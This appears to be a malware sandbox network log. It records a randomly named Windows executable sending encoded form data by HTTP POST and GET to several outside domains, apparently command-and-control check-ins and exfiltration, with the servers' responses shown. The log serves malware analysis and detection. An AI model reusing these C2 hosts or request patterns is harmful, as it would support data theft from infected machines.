                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLhXaCQoO%2Fg%2FS4kXZZzMSf6iCMfEsJC7wuHIHjKvgOsaEKfAa0VTadCSFm5%2FVnxyeEblOeDCbXCANW6GUtC1SD50Uix5NtbC8%2Fj6gTNmvWxai0AxHl3X2aEV%2B%2FjvrmHOEPU%2BHi4S"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade46f8b641ec-EWR
                                              Content-Encoding: gzip
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                              Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6
                                              Jul 21, 2024 13:32:04.501636982 CEST | 91 | IN | Data Raw: 89 86 84 16 08 2b 44 0e 12 33 51 60 dc 87 84 c6 c0 b4 02 4e 33 34 17 95 6f 8c 57 48 60 0a 34 66 b9 90 54 b2 b4 84 2d a7 05 65 29 5d a5 68 52 0f 2b 55 a4 ad bb 55 df da 63 f3 aa 7f 40 f8 0f 00 00 ff ff 0d 0a 63 0d 0a e3 e5 02 00 c9 45 66 f6 dd 04
                                              Data Ascii: +D3Q`N34oWH`4fT-e)]hR+UUc@cEf0


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.7 | 49717 | 188.114.97.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:06.420315027 CEST | 449 | OUT | GET /xm40/?5HE=daAh1PvHixV61uAQZMYKPaNePBcxkEwbh0Ym6iIWO855OlL+0fA+LsjnAgtj7WyOZoCeoLSk25i6sMGFDrtEZ/sdfpdR1CdNhpbdr9VgkorBlDalMPv+Xn4VuwyhQF+VdIAPT792X8nN&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.olhadeputat.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:06.994693995 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Sun, 21 Jul 2024 11:32:06 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              X-Powered-By: ASP.NET
                                              CF-Cache-Status: DYNAMIC
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I43eZN%2FxfKgbDsrxD3A1cnumjZqq3E3oa1BGwFR%2FRgaVpv56fLeYgZQIVDFMeeG%2BjpPm2l%2FEHFdJ%2FYduCvBMygvrCfkjyRAu9TJywKMpYEzaZQHO3OQzeTAasFNlnywMelKRSVxh"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6ade569f130cb8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a [TRUNCATED]
                                              Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;
                                              Jul 21, 2024 13:32:06.994718075 CEST | 224 | IN | Data Raw: 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d
                                              Data Ascii: padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding
                                              Jul 21, 2024 13:32:06.994730949 CEST | 392 | IN | Data Raw: 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65
                                              Data Ascii: :10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.7 | 49718 | 103.168.172.37 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:12.332983017 CEST | 709 | OUT | POST /w977/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.jleabres.com/w977/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 35 48 45 3d 4e 78 41 4a 75 64 7a 38 71 63 4f 77 37 4c 71 74 68 34 53 6a 34 36 48 33 37 4b 64 78 75 57 67 6b 4e 54 2b 7a 76 49 70 59 6a 30 47 4f 4f 56 51 44 34 45 65 49 67 52 4f 37 63 48 6e 30 65 35 55 6c 6a 49 2f 52 74 35 57 6b 76 64 56 6f 32 43 2b 74 70 63 4d 4c 7a 79 4b 55 52 70 43 45 66 6c 35 42 76 33 46 33 51 79 6b 54 35 76 53 36 47 52 55 33 51 43 33 6c 32 36 6e 2b 71 6d 47 6d 45 74 50 70 71 69 51 2b 32 43 4f 5a 35 57 35 63 46 69 38 52 54 4c 67 36 76 6d 42 42 57 6b 31 45 68 6e 55 5a 66 54 62 4c 6b 50 62 53 44 4f 65 74 4b 49 31 35 36 7a 39 37 31 56 56 6c 35 43 75 50 31 43 5a 55 4d 43 31 70 57 67 4a 79 42 4c 49 32 74 67 77 6f 32 77 3d 3d
                                              Data Ascii: 5HE=NxAJudz8qcOw7Lqth4Sj46H37KdxuWgkNT+zvIpYj0GOOVQD4EeIgRO7cHn0e5UljI/Rt5WkvdVo2C+tpcMLzyKURpCEfl5Bv3F3QykT5vS6GRU3QC3l26n+qmGmEtPpqiQ+2COZ5W5cFi8RTLg6vmBBWk1EhnUZfTbLkPbSDOetKI156z971VVl5CuP1CZUMC1pWgJyBLI2tgwo2w==
                                              Jul 21, 2024 13:32:13.847666025 CEST | 570 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:13 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_c0b6e81f34d8775b85ef094bbfe3f4d8
                                              Content-Encoding: br


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              14 | 192.168.2.7 | 49719 | 103.168.172.37 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:15.051909924 CEST | 729 | OUT | POST /w977/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.jleabres.com/w977/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=NxAJudz8qcOw6oytnYuj5aH0m6dxg2ggNTyzvJtIkCuOOwUD5ByInRO7EXnxTZUujIyut8ukvZFo2G2tov0IyiKsZJCGbl5Bv3F3Qyxb5rG6GBE3Rj3i16n5gGGmVdP1qiQY2HWz5URcFn4RTfM542BHLU0wwX1QWSv09trtaZa1P+obgRxXrEte9AK5ikEhODxxbC9Te8tcgyRsgLh2c8lewQ5lBq/yA6h4Hwo=
                                              Jul 21, 2024 13:32:15.734257936 CEST | 570 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:15 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_7a8f4592912729422423db5713491e65
                                              Content-Encoding: br


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.7 | 49720 | 103.168.172.37 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:17.611635923 CEST | 1742 | OUT | POST /w977/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.jleabres.com/w977/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE= [TRUNCATED]
                                              Jul 21, 2024 13:32:18.070393085 CEST | 570 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:18 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_200340ef876e89d18ffe388d34538054
                                              Content-Encoding: br


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.7 | 49721 | 103.168.172.37 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:20.140944958 CEST | 446 | OUT | GET /w977/?5HE=Azoptr76oomZ4omVga/Zpvzn3e5/jEQILAaug91rkSWZLV4kzjGPp1+9B2L+PrxFmPSw5JOBqYEy7G3QmPMO+i+kevqWQBtSr1hLWjIV+6WjfyA1QEzp+Ir7n0GaYPvcmgAl6gWaxTBt&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jleabres.com
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:21.613616943 CEST | 796 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Sun, 21 Jul 2024 11:32:21 GMT
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 544
                                              Connection: close
                                              x-backend: web4
                                              X-Frontend: frontend1
                                              X-Trace-Id: ti_044714c003d642aee30573eebe56373c
                                              Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.7 | 49722 | 188.114.96.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:31.846313953 CEST | 718 | OUT | POST /bked/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Origin: http://www.evoolihubs.shop
                                              Connection: close
                                              Content-Length: 216
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.evoolihubs.shop/bked/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=dBrkk64gnaZ6WNlYNqx+vVf/MGjfKLJsiWjI8WclQ60d0+ds1VGq7gMCeq802DB9bTeXk58tY3hXvpzwE1e+RVlmQvIZ3r4sW75CrEIAaQ+DPxsDpr9PpcmerRTY/y6+TRs6GJEQWv+DZHAvlxeGg5eYykH7/O0RhbMy0RGJKbfKHyqiN+DV6MoKEu16PzAxfijLyN/UHDh2lm5glQ==
                                              Jul 21, 2024 13:32:32.308267117 CEST | 847 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:32 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:32 GMT
                                              Location: https://www.evoolihubs.shop/bked/
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0QXELI7Ts8ZSA03ZZcLhIoB0c2st8eHV67NIptXUN%2BAe5%2BUyfo27aBo4S0XTj8np4nDJ9vVJREjzJMv7tae0JkNP1b4BfW5SaNPR7wJDjKdnfjgDRgUMjwZkEWkkzf%2BiyoaSgRMr"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8a6adef59b6d438b-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.7 | 49723 | 188.114.96.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:34.415971041 CEST | 738 | OUT | POST /bked/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Origin: http://www.evoolihubs.shop
                                              Connection: close
                                              Content-Length: 236
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.evoolihubs.shop/bked/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=dBrkk64gnaZ6WtVYINl+7Ff8Q2jfErIliWnI8Xo1QJQd0fts0UGq4gMCVK89rzBmbTCpk5QtY31XvoDwEEe5XFlobPIbqb4sW75CrEcqaRWDPBcDoK9Ig8mfjxTYuC73TRsYGIopWt2DZGwvlgfQ1peet0G6//cf5pAR8jLUGrvyLk3AXcP5kdQxAsRMYVdEdjnT/vL1Y0Eco0YkzpZwGOrb1oGUwfj3IBm0z3A=
                                              Jul 21, 2024 13:32:34.870908976 CEST | 847 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:34 GMT
                                              Location: https://www.evoolihubs.shop/bked/
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OqnGd8aUNrCgC7B%2FzMsFAoSUX5Q3HjH%2BV%2FlICAqd0Z44LqVeAL454q5dPoalKacRGTJWyCcdhiCe0YHLNeBERhAiqkkLTYmqUhCqbTCd29BlAVfXiSYmGZZaOf7SOm4pFHQSeWDM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8a6adf059a2178e8-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.7 | 49724 | 188.114.96.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:36.952569962 CEST | 1751 | OUT | POST /bked/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Origin: http://www.evoolihubs.shop
                                              Connection: close
                                              Content-Length: 1248
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Referer: http://www.evoolihubs.shop/bked/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: 5HE=dBrkk64gnaZ6WtVYINl+7Ff8Q2jfErIliWnI8Xo1QJYd0M1s1zaq5gMCYq8wrzAkbTatk5MbYxxXuO/wCwy5eFloUvIa3r45W7pGrHkqaRWDPCEDvb9IscmerRTU/y7fTR0iGIsmXcWDZlIvmS3Q0Jecu0Hp//Bd5pMd8m2zGsDyJ1KgPeDd6tQCfaZcbHtEcj75wIvmaVUkq3Jt1coJRNn+74jGwvyAYSmengOKoYmQ10T2PN2oevTMFjKUZ3K+UV93JC6bxk3Mp7vV/Vb1sYH1qpwGXTdJ7VFw+xKIZnjoz4L57xgpFhACYqfqCn3uNrIuuzsebyguK9QZFuv12ZTakvEx9TTM+cDAcSO96doGz+IRBzPbzSjy//LU9QsOJf2mkvCUUMpjYM3X94C+D5sFA9dyfPMkxYbOJwpGm0LSDm546hfSXHPBf3A5BVCEDxqOH1RMwaUORwsiA/OqbhG/Ye0jjfYr1YDuFyoHUIbnkSQegitcldH/4HODM2NX9CFMb+hPXEDBngbjknGGDR14VqEfON2Q5oPBqbXPCIXcln1rB3u75khE67MK/3XIpcj29tRew4rhLTV7JbKCm/YxcJj8vX/AY1Iewm9CxAfHkaaMpK3cDbYqWFrFSA+H3HPDwW6R6jcDZMvuOzY/K6w6HwiUOkZ4yuGvUpCvZD8ZQuF8XC4CHVC924nizjBYMfgjHIBpe1hnvIFIm1C9ZGneEOuJ14SQdVgddHQxjdPxonYI61PuXm+Dbo1dFzAyLCpPReOfc6d05zz0N3jvRC5cgVywG0fRurJOvk+KrkleIT3xujocbcErGzjiMLJUN/zk2vIMTxq+VeVNXezsIamwEeNlQfYiBvuhEcidMQoz5u2FoLMahcmzIiAHPwTQt5pIk21IBEnwosUD0IIXREDP1OObgUSxEoV4UQbRLcZ/cofcO7HYWyYdjzG39HhJsRau+XchxnugjNn0YuvzEVnvrsvwY3LymBnKsdPasL4Grbf4 [TRUNCATED]
                                              Jul 21, 2024 13:32:37.409792900 CEST | 845 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:37 GMT
                                              Location: https://www.evoolihubs.shop/bked/
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVF2lr%2BeZZZGROvLq7W%2BQW9X64oFacsfLsD7H64IUz6sOq1nW86NPTXt0kJKUMRptUeROUiZ0Ig8VZFWTCbmGYAQTHV7RhTjPr4vRDl24qZjJHXC3dIBD9rASFaApQziETbfsuAf"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Vary: Accept-Encoding
                                              Server: cloudflare
                                              CF-RAY: 8a6adf157fcc4261-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.7 | 49725 | 188.114.96.3 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 21, 2024 13:32:39.485057116 CEST | 449 | OUT | GET /bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.evoolihubs.shop
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 21, 2024 13:32:39.957283020 CEST | 984 | IN | HTTP/1.1 301 Moved Permanently
                                              Date: Sun, 21 Jul 2024 11:32:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 167
                                              Connection: close
                                              Cache-Control: max-age=3600
                                              Expires: Sun, 21 Jul 2024 12:32:39 GMT
                                              Location: https://www.evoolihubs.shop/bked/?5HE=QDDEnNwQpb5JatkHP5Ujvy7oB3/mJq1wkhHN+QA3R40qpI1p3EHt4xIxf5IDvSUmLm24xdAndElLjryJNFC6VX5rU/4u1ZoNU71gjUwgGDzFCy1dhdBzksntmTnqyiroVCcmEoAnVJrC&UXR=kTP8XfI8
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rFIo%2FboOpE8%2F4mTVspBBB%2FLiZ8ZYla5MNvWFXDSMIX7JU9nGtzoTDVfQCMVnxBzGr3yIEKKQ7e2W4noOAhoXaRCuCqyx2t5KEqyyUS3rbJaehKU2Hkhdv%2BGew1vNNnSC1o4pHSH4"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8a6adf255e9e1778-EWR
                                              alt-svc: h3=":443"; ma=86400
                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.7 | 49726 | 203.161.41.207 | 80 | 6392 | C:\Program Files (x86)\YrgEYtDOHUGmcLRrTUHZXQpKxBQAzGXkUVtTPmKzbAHHfbeNqppBnpekaSNxZCQdDupGJjEHB\QAWHbhvedb.exe
                                              Timestamp | Bytes transferred | Direction | Data
